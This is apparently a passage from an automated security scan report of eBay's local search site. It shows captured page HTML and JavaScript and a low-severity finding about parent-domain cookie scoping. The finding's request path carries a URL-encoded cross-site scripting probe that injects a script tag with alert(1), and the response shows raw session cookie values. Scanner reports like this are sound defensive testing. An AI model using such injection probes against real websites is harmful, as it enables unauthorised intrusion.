<span class="rstar" style="height: 12px; background-position: 0pt 1px; width: 67.5px"></span>
</span><span class="revCnt">(10)</span></div>
               <div class="retTtl"><span class="catTtl">Carried at 1 retailer</span></div>
               <div class="brandDiv">
                       
                       <a href="javascript:;" storetype="storeicon" mid="4483"><img src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" class="st-img" /></a>
                   
               </div>        
           </div>
       </td>
       <td class="priTd">
           <div class="priDiv">
               N/A
           </div>
       </td>
   </tr>
</table>
<div class="beak"></div>
</div>    

<div class="lst" type="products" id="item_2" offers="8679175">
<table cellspacing="0" cellpadding="0" border="0">
   <tr class="lstTr">
       <td class="imgContTd">
           <a href="javascript:;">
               <img width="140" height="140" border="0" alt="TEST TUBE WONDERS" src="http://imagethumbnails.milo.com/008/679/624/200/8679175_9912624_200.jpg" />
           </a>
       </td>
       <td>
           <div class="lstInfo">
               <div class="ttlDiv"><a class="ttl" target="_blank" title='Roxul 8-Pack 23"W x R-0 Fiberglass Insulation Batts' href="http://www.ebay.com/ctg/mp.html?_flppid=7641623&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m2&_fpos=75217">Roxul 8-Pack 23"W x R-0 Fiberglass Insulation Batts</a></div>
               <div><span class="rw" style="height: 12px; background-position: 0pt -10px;">
<span class="rstar" style="height: 12px; background-position: 0pt 1px; width: 67.5px"></span>
</span><span class="revCnt">(6)</span></div>
               <div class="retTtl"><span class="catTtl">Carried at 1 retailer</span></div>
               <div class="brandDiv">
                       
                       <a href="javascript:;" storetype="storeicon" mid="4483"><img src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" class="st-img" /></a>
                   
               </div>        
           </div>
       </td>
       <td class="priTd">
           <div class="priDiv">
               N/A
           </div>
       </td>
   </tr>
</table>
<div class="beak"></div>
</div>    

<div id="lstloading" class="lst-load"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div>    
</div>
</div><div><div style="padding:5px; background-color:#F5F5F5"><div><div class="toppg" id="v4-37">
       <div>Page <b>1</b> of <b>1</b></div>
       <span>
           <a class="toppg-p toppg-pd" id="pg-p" type="prev" enabled="false">
           </a>
       </span>
       <span>
           <a class="toppg-n toppg-nd" href="javascript:;" id="pg-n" type="next" enabled="false">
           </a>
       </span>
</div></div><div style="margin-top:10px;font-size:11px;">Pricing &amp; inventory <a target="blank" href="/html/disclaimer.html">subject to Terms</a></div><div style="clear:both"></div></div></div></div></div></div><div id="map-prev" class="map"></div><div class="clr"></div></div><div class="srpLoad" id="srploading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div><div class="clr"></div></div><div class="footer" style="width:755px;"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab1ed36f1340a03663a54955ff73ced6");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=MIN:CGI @egfp@--></div></div><div id="map-cont" class="map"><div id="map_canvas" style="height: 100%"></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
function $4(){return function(event){return this.init();};};_d.add('body','load',function(event){ setPos(25.0) });_d.add('body','load',function(event) { this.init(); },vjo.ebay.local.filter.Filter);_d.add('body','load',function(event) { this.initPriceFilter(); },vjo.ebay.local.srp.pricefilter.PriceFilter);_d.add('body','load',function(event) { this.init(); },vjo.ebay.local.categorylist.CategoryList);_d.add('body','load',function(event) { this.initFS(); },vjo.ebay.local.srp.filmstrip.Filmstrip);_d.add('body','load',$4(),vjo.ebay.local.pagination.Pagination);_d.add('body','load',function(event) { this.setLocalProducts({"item_1":[{"merchant_title":"Lowe's","merchant_id":"4483","lng":"-96.443819","store_link":null,"price":null,"logo":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png","lat":"32.743819"}],"item_2":[{"merchant_title":"Lowe's","merchant_id":"4483","lng":"-96.443819","store_link":null,"price":null,"logo":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png","lat":"32.743819"}]}); },vjo.ebay.local.srp.map.localpickup.LocalPickupMap);_d.add('body','load',$4(),vjo.ebay.local.pagination.Pagination);_d.add('body','load',function(event) { this.init("75217", "2"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-localsch,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac89cf03-->

2.18. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac89d4b4
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpOBYWM4OWQ0YjQxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1NzQA7gCwTwaTgWh0dHA6Ly9sb2NhbC5lYmF5LmNvbTo4MC9sb2NhbC9sb2NhbHNjaC5odG1sLV9ua3c9eHNzJl9sb2NhdGlvbj03NTIxNyZfZnBvcz03NTIxNyZfdHJrc2lkPXA1NzkxLm0xJmRjMTNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQlMjgxJTI5JTNDP19ua3c9Jl9mcG9zPTc1MjE3Jl9mbHByYWQ9MjUuMCZfY2F0aWQ92uoVVQ**; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OBYWM4OWQ0YjQxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1NzQAywABTwVJCTGiuizK; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 22243
Date: Thu, 05 Jan 2012 06:24:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - </title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;margin:10px 0 0} .srpi {width:411px} .srpi input{width:295px;} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325727618260" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325727618260;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AhhTUZiY*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div id="LeftNav" class="lnav">
<!-- <fontT><h1 class="locs">Local Shopping</h1></fontT> -->
<a href="/local" class="locs">
   <img src="/local/images.i?file=LocalShoppingRibbon.png" />
   </a>
<!-- <form action="/localsch.html" name="distanceForm" id="distanceForm" class="sForm">-->
<div name="distanceForm" id="distanceForm" class="sForm">
   
           <input class="zipcode" autocomplete="off" name="_location" id="_location" value=", 75217">
           <div id="autocomplete" class="autocomplete"></div>
       
    <input type="hidden" id="_fpos" name="_fpos" value="75217">
        <input name="zipSub" type="button" value="" class="disSub">
        <div class="clr"></div>
<!-- <div class="cnz">
   <div id="citystate" style="float:left">, 75217</div>
   <div class="pd" style="float:left"></div>
   <div style="clear:both"></div>
   
</div> -->
<input type="hidden" id="zip" value="75217">
<!--<input name="_fpos" id="_fpos" value="75217" maxlength="5"></span> <input type="submit" value="" class="disSub">-->
   <div class="horizontal_track">
   <div class="horizontal_slit">
       <div id="progress" class="slider_bar" style="width:121.8px">&nbsp;</div>
   </div>
   <div class="simg" id="slider" style="left:91px" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">
       <div id="display" class="disp" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">25 miles</div>
       <input type="hidden" value="25" name="_flprad" id="_flprad">
       </div>
   </div>
   </div>
<div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding : 5px 0 0 10px"><a style="font-size:13px;font-weight:bold;color:#002398;display:none" href="/local/localsch.html?_nkw=&amp;_fpos=75217&amp;_inclfltr=1" id="clr" name="clrfltr">Clear all refinements</a></div><div style="padding:5px 0 5px 10px;font-family:Arial;font-weight:bold;font-size:12px;color:#333333"><h4 style=" margin: 0 0 10px;">By Price :</h4><div id="pFil"><span style="padding-right:5px;">$</span><input type="text" id="_sp" name="_sp" size="3" value="" style="margin:0;"><span style="padding: 0 5px;">to $</span><input id="_ep" name="_ep" type="text" size="3" value="" style="margin:0 3px 0 0;"><input type="button" class="disSub disSubDis" name="bP" id="bP" value=""></div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div><div class="ifltr-W">
   <h4 class="ifltr-hdr">Include only</h4>
   
   <div class="ifltr-lst">
       <ul>
           <li>
               <input type="radio" name="inclFltr" checked=checked value="1">
               <span>Local Retailers</span>
           </li>
           <li>
               <input type="radio" name="inclFltr" value="0">
               <span>eBay Sellers</span>
           </li>            
       </ul>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div id="fs"></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding:5px 0 10px 20px"><a href="http://www.ebay.com/sch/i.html?_nkw=" target="blank" style="font-size:13px;font-weight:bold;color:#003dac;">View results on ebay.com</a></div></div><div class="cont"><div style="float:left"><div>

<div class="srpbx1">
       <form action="/local/localsch.html" method="get" onsubmit="return vjo.ebay.local.LocalLandingPage.onSubmit();">
           <div>
               <div style="float:right">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi srchbox">
                   <input type="text" id="txt" name="_nkw" placeholder="Search locally " value='' autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               
               
               
               
                   <input type="hidden" value="75217" name="_fpos">
               
               
               
                   <input type="hidden" value="" name="_odkw">
                   
                                                                                   
           </div>
       </form>
</div></div><div id="localResults" class="results"><div id="LocalProductResultSet" class="bgshd"><div><div style="padding:5px; background-color:#F5F5F5" tt="0"><div></div><div style="clear:both"></div><div style="padding:10px 0"><div class="smm-s smm-e"><div class="sm-imc smm-imc"><b class="g-hdn">error</b><div class="smm-cnt">Your search returned 0 results</div></div></div></div></div></div><div></div><div></div></div></div></div><div id="map-prev" class="map"></div><div class="clr"></div></div><div class="srpLoad" id="srploading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div><div class="clr"></div></div><div class="footer" style="width:755px;"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab8615171340a0366174f834ff56cbbf");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><div id="map-cont" class="map"><div id="map_canvas" style="height:100%"></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
